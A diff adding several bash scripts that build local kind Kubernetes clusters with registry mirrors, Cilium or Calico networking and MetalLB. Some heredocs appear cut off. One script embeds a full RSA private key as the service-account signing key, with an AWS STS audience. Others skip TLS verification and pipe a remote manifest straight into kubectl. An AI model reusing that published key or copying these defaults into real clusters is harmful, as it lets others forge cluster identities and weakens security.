+ - name: oidc + hostPath: /etc/kubernetes/oidc + mountPath: /etc/kubernetes/oidc + readOnly: true + metadata: + name: config +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +helm repo add cilium https://helm.cilium.io/ + +helm --kube-context kind-kind${number} install cilium cilium/cilium --version 1.15.5 \ + --namespace kube-system \ + --set prometheus.enabled=true \ + --set operator.prometheus.enabled=true \ + --set hubble.enabled=true \ + --set hubble.metrics.enabled="{dns:destinationContext=pod|ip;sourceContext=pod|ip,drop:destinationContext=pod|ip;sourceContext=pod|ip,tcp:destinationContext=pod|ip;sourceContext=pod|ip,flow:destinationContext=pod|ip;sourceContext=pod|ip,port-distribution:destinationContext=pod|ip;sourceContext=pod|ip}" \ + --set hubble.relay.enabled=true \ + --set hubble.ui.enabled=true \ + --set kubeProxyReplacement=partial \ + --set hostServices.enabled=false \ + --set hostServices.protocols="tcp" \ + --set externalIPs.enabled=true \ + --set nodePort.enabled=true \ + --set hostPort.enabled=true \ + --set bpf.masquerade=false \ + --set image.pullPolicy=IfNotPresent \ + --set cni.exclusive=false \ + --set ipam.mode=kubernetes +kubectl --context=kind-kind${number} -n kube-system rollout status ds cilium || true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +mkdir -p /tmp/oidc + +cat <<'EOF' >/tmp/oidc/sa-signer-pkcs8.pub +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA53YiBcrn7+ZK0Vb4odeA +1riYdvEb8To4H6/HtF+OKzuCIXFQ+bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL +395nvxdly83SUrdh7ItfOPRluuuiPHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0Zw +zIM9OviX8iEF8xHWUtz4BAMDG8N6+zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm +5X5uOKsCHMtNSjqYUNB1DxN6xxM+odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD8 +2p/16KQKU6TkZSrldkYxiHIPhu+5f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9 +ywIDAQAB +-----END PUBLIC KEY----- +EOF + +cat <<'EOF' >/tmp/oidc/sa-signer.key +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA53YiBcrn7+ZK0Vb4odeA1riYdvEb8To4H6/HtF+OKzuCIXFQ ++bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL395nvxdly83SUrdh7ItfOPRluuui +PHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0ZwzIM9OviX8iEF8xHWUtz4BAMDG8N6 ++zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm5X5uOKsCHMtNSjqYUNB1DxN6xxM+ +odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD82p/16KQKU6TkZSrldkYxiHIPhu+5 +f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9ywIDAQABAoIBAB8tro+RMYUDRHjG +el9ypAxIeWEsQVNRQFYkW4ZUiNYSAgl3Ni0svX6xAg989peFVL+9pLVIcfDthJxY +FVlNCjBxyQ/YmwHFC9vQkARJEd6eLUXsj8INtS0ubbp1VxCQRDDL0C/0z7OSoJJh +SwboqjEiTJExA2a+RArmEDTBRzdi3t+kT8G23JcqOivrITt17K6bQYyJXw7/vUdc +r/R+hfd5TqVq92VddzDT7RNJAxsbPPXjGnESlq1GALBDs+uBGYsP0fiEJb2nicSv +z9fBnBeERhut1gcE0C0iLRQZb+3r8TitBtxrZv+0BHgXrkKtXDwWTqGEKOwC4dBn +7nxkH2ECgYEA6+/DOTABGYOWOQftFkJMjcugzDrjoGpuXuVOTb65T+3FHAzU93zy +3bt3wQxrlugluyy9Sc/PL3ck2LgUsPHZ+s7zsdGvvGALBD6bOSSKATz9JgjwifO8 +PgqUz1kXRwez2CtKLOOCFFtcIzEdWIzsa1ubNqLzgN7rD+XBkUc2uEcCgYEA+yTy +72EDMQVoIZOygytHsDNdy0iS2RsBbdurT27wkYuFpFUVWdbNSL+8haE+wJHseHcw +BD4WIMpU+hnS4p4OO8+6V7PiXOS5E/se91EJigZAoixgDUiC8ihojWgK9PYEavUo +hULWbayO59SxYWeUI4Ze0GP8Jw8vdB86ib4ulF0CgYEAgyzRuLjk05+iZODwQyDn +WSquov3W0rh51s7cw0LX2wWSQm8r9NGGYhs5kJ5sLwGxAKj2MNSWF4jBdrCZ6Gr+ +y4BGY0X209/+IAUC3jlfdSLIiF4OBlT6AvB1HfclhvtUVUp0OhLfnpvQ1UwYScRI +KcRLvovIoIzP2g3emfwjAz8CgYEAxUHhOhm1mwRHJNBQTuxok0HVMrze8n1eov39 +0RcvBvJSVp+pdHXdqX1HwqHCmxhCZuAeq8ZkNP8WvZYY6HwCbAIdt5MHgbT4lXQR +f2l8F5gPnhFCpExG5ZLNg/urV3oAQE4stHap21zEpdyOMhZb6Yc5424U+EzaFdgN +b3EcPtUCgYAkKvUlSnBbgiJz1iaN6fuTqH0efavuFGMhjNmG7GtpNXdgyl1OWIuc +Yu+tZtHXtKYf3B99GwPrFzw/7yfDwae5YeWmi2/pFTH96wv3brJBqkAWY8G5Rsmd +qF50p34vIFqUBniNRwSArx8t2dq/CuAMgLAtSjh70Q6ZAnCF85PD8Q== +-----END RSA PRIVATE KEY----- +EOF + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + extraMounts: + - containerPath: /etc/kubernetes/oidc + hostPath: /tmp/oidc + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +kubeadmConfigPatches: +- | + kind: ClusterConfiguration + apiServer: + extraArgs: + service-account-key-file: /etc/kubernetes/pki/sa.pub + service-account-key-file: /etc/kubernetes/oidc/sa-signer-pkcs8.pub + service-account-signing-key-file: /etc/kubernetes/oidc/sa-signer.key + service-account-issuer: https://solo-workshop-oidc.s3.us-east-1.amazonaws.com + api-audiences: sts.amazonaws.com + extraVolumes: + - name: oidc + hostPath: /etc/kubernetes/oidc + mountPath: /etc/kubernetes/oidc + readOnly: true + metadata: + name: config +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat <&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + ipFamily: ipv6 +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].GlobalIPv6Address') +networkkind=$(echo ${ipkind} | rev | cut -d: -f2- | rev): + +#kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}${number}1-${networkkind}${number}9 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +curl -sL https://raw.githubusercontent.com/projectcalico/calico/v3.28.1/manifests/calico.yaml | sed 's/250m/50m/g' | kubectl --context kind-kind${number} apply -f - + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +# Preload images +cat << EOF >> images.txt +quay.io/cilium/cilium:v1.15.5 +quay.io/cilium/operator-generic:v1.15.5 +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done + +helm repo add cilium https://helm.cilium.io/ + +helm --kube-context kind-kind${number} install cilium cilium/cilium --version 1.15.5 \ + --namespace kube-system \ + --set prometheus.enabled=true \ + --set operator.prometheus.enabled=true \ + --set hubble.enabled=true \ + --set hubble.metrics.enabled="{dns:destinationContext=pod|ip;sourceContext=pod|ip,drop:destinationContext=pod|ip;sourceContext=pod|ip,tcp:destinationContext=pod|ip;sourceContext=pod|ip,flow:destinationContext=pod|ip;sourceContext=pod|ip,port-distribution:destinationContext=pod|ip;sourceContext=pod|ip}" \ + --set hubble.relay.enabled=true \ + --set hubble.ui.enabled=true \ + --set kubeProxyReplacement=partial \ + --set hostServices.enabled=false \ + --set hostServices.protocols="tcp" \ + --set externalIPs.enabled=true \ + --set nodePort.enabled=true \ + --set hostPort.enabled=true \ + --set bpf.masquerade=false \ + --set image.pullPolicy=IfNotPresent \ + --set cni.exclusive=false \ + --set ipam.mode=kubernetes +kubectl --context=kind-kind${number} -n kube-system rollout status ds cilium || true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + 